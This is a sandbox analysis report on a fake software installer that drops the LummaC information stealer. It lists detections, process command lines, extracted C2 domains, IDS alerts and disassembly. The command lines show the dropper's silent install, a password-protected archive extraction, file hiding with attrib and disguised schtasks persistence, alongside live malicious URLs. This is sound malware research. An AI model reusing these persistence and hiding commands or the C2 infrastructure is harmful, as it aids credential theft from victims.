Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Overview

General Information

Sample name:Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Analysis ID:1632503
MD5:4f4e6dd4d4b9d96e69b7f8f97e867023
SHA1:51db1de1d11976911dee96ed18b1fc903ea16676
SHA256:43b9bb932501d8d186d9fd49ee5fa1a1c47283e1db898a68b5c846eb7b971aee
Tags:exeNOBISLLCuser-SquiblydooBlog
Infos:

Detection

LummaC Stealer
Score:64
Range:0 - 100
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops password protected ZIP file
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses attrib.exe to hide files
Uses schtasks.exe or at.exe to add and modify task schedules
Connects to a URL shortener service
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables security privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 2500 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)
    • Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 1408 cmdline: "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)
      • Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)
        • Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)
          • idp.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8 MD5: 6482EE0F372469D1190C74BD70D76153)
            • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7656 cmdline: "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 7708 cmdline: attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
          • schtasks.exe (PID: 7724 cmdline: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7796 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • taskshostw.exe (PID: 7772 cmdline: C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe MD5: 33645B3AFD79ED29F7E6F476D7F6ED4B)
  • taskshostw.exe (PID: 8128 cmdline: C:\Users\user\AppData\Local\programs\common\taskshostw.exe MD5: 33645B3AFD79ED29F7E6F476D7F6ED4B)
  • cleanup
{"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        17.3.taskshostw.exe.2990000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          17.2.taskshostw.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            17.3.taskshostw.exe.2990000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 6800, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 7724, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 6800, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 7724, ProcessName: schtasks.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 6800, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 7724, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-08T03:14:26.697100+010020283713Unknown Traffic192.168.2.449717104.18.111.161443TCP
              2025-03-08T03:14:29.297286+010020283713Unknown Traffic192.168.2.449719164.132.58.105443TCP
              2025-03-08T03:14:49.607822+010020283713Unknown Traffic192.168.2.449727172.67.194.165443TCP
              2025-03-08T03:14:51.824281+010020283713Unknown Traffic192.168.2.449728172.67.194.165443TCP
              2025-03-08T03:15:41.810908+010020283713Unknown Traffic192.168.2.449729172.67.194.165443TCP
              2025-03-08T03:15:44.107187+010020283713Unknown Traffic192.168.2.449730172.67.194.165443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-08T03:14:50.090104+010020546531A Network Trojan was detected192.168.2.449727172.67.194.165443TCP
              2025-03-08T03:15:42.293386+010020546531A Network Trojan was detected192.168.2.449729172.67.194.165443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-08T03:14:50.090104+010020498361A Network Trojan was detected192.168.2.449727172.67.194.165443TCP
              2025-03-08T03:15:42.293386+010020498361A Network Trojan was detected192.168.2.449729172.67.194.165443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://rea.grupolalegion.ec/RAvira URL Cloud: Label: malware
              Source: https://rea.grupolalegion.ec/willrandom.zipUAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site/Avira URL Cloud: Label: malware
              Source: https://rea.grupolalegion.ec/willrandom.zipAvira URL Cloud: Label: malware
              Source: https://rea.grupolalegion.ec/willrandom.zipqAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site/apiAvira URL Cloud: Label: malware
              Source: https://rea.grupolalegion.ec/willrandom.zipWWAvira URL Cloud: Label: malware
              Source: https://rea.grupolalegion.ec/Avira URL Cloud: Label: malware
              Source: https://willpowerwav.site/YAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site/apiFAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site:443/apiAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site/apixAvira URL Cloud: Label: malware
              Source: https://willpowerwav.site/:Avira URL Cloud: Label: malware
              Source: willpowerwav.siteAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exeAvira: detection malicious, Label: TR/AVI.Lumma.jtxjg
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}
              Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exeReversingLabs: Detection: 66%
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: willpowerwav.site
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: uncertainyelemz.bet
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: hobbyedsmoker.live
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: presentymusse.world
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: deaddereaste.today
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: subawhipnator.life
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: privileggoe.live
              Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmpString decryptor: boltetuurked.digital
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeEXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exeJump to behavior

              Compliance

              barindex
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeEXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exeJump to behavior
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00FF6CE2
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00FF7904
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000BBh]17_2_00447A90
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]17_2_00444C00
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi]17_2_00446040
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then push dword ptr [esi+14h]17_2_0041083A
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0041083A
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [ebx+ecx-000000D2h]17_2_0042F8C9
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_004298F0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+02h]17_2_0044108A
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h17_2_004400A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [eax]17_2_004400A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h17_2_00443100
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2809052Bh]17_2_00443100
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi+27577599h]17_2_00443100
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov byte ptr [eax], cl17_2_0041D12C
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h17_2_0041D12C
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]17_2_0040A1A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov word ptr [eax], cx17_2_004201AB
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h17_2_004469B0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+140AC537h]17_2_00445A52
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov eax, ebx17_2_00421260
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov byte ptr [eax], cl17_2_0041C221
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h17_2_0041C221
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+38h]17_2_0042D23F
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_004232C0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ebx, byte ptr [edx]17_2_0043CAD0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov dword ptr [esp+08h], edi17_2_00433ADD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0042C2E0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], esi17_2_00446AE0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+578BD47Eh]17_2_0040FAFA
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+02h]17_2_00440A80
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+02h]17_2_00440A80
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0040EB00
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]17_2_00426380
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h17_2_0041ABA1
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0041ABA1
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_00429BA0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-72CBAB97h]17_2_0041FBB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov edx, ecx17_2_0042C3BD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0042C3BD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ebx, ecx17_2_00444C40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]17_2_00444C40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then push esi17_2_00425453
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov word ptr [esi], cx17_2_00424C60
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov byte ptr [ecx], bl17_2_0043347A
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov eax, edx17_2_00423400
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov word ptr [ecx], dx17_2_00447CB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_00429D50
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [edx]17_2_00445553
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-2809055Fh]17_2_00411D78
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then jmp dword ptr [0044EA9Ch]17_2_0042E534
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+078CCBDEh]17_2_004475C0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then lea ecx, dword ptr [eax+27h]17_2_0041DD90
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h17_2_0041DD90
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then lea ecx, dword ptr [eax+27h]17_2_0041DD90
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [edx]17_2_004025A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]17_2_0043F640
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_0043F640
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ecx, eax17_2_00411E6A
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-7Dh]17_2_00411605
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax+27DDFCF1h]17_2_0042BE06
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]17_2_00418E80
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+06h]17_2_004206A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]17_2_0041A757
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]17_2_00402770
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], CA198B66h17_2_0042BF10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]17_2_0042FF10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-000000ECh]17_2_0042B7C8
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov byte ptr [edi], al17_2_00433FCE
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]17_2_00433FCE
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ebx, byte ptr [edi+ecx-70AAEE47h]17_2_00411FF7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then mov byte ptr [edi], al17_2_00433FCC
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]17_2_00433FCC
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]17_2_0040A7A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49729 -> 172.67.194.165:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49727 -> 172.67.194.165:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49729 -> 172.67.194.165:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49727 -> 172.67.194.165:443
              Source: Malware configuration extractorURLs: willpowerwav.site
              Source: Malware configuration extractorURLs: uncertainyelemz.bet
              Source: Malware configuration extractorURLs: hobbyedsmoker.live
              Source: Malware configuration extractorURLs: presentymusse.world
              Source: Malware configuration extractorURLs: deaddereaste.today
              Source: Malware configuration extractorURLs: subawhipnator.life
              Source: Malware configuration extractorURLs: privileggoe.live
              Source: Malware configuration extractorURLs: boltetuurked.digital
              Source: unknownDNS query: name: tinyurl.com
              Source: unknownDNS query: name: tinyurl.com
              Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
              Source: Joe Sandbox ViewIP Address: 190.92.154.206 190.92.154.206
              Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
              Source: Joe Sandbox ViewIP Address: 104.18.111.161 104.18.111.161
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 164.132.58.105:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.18.111.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 172.67.194.165:443
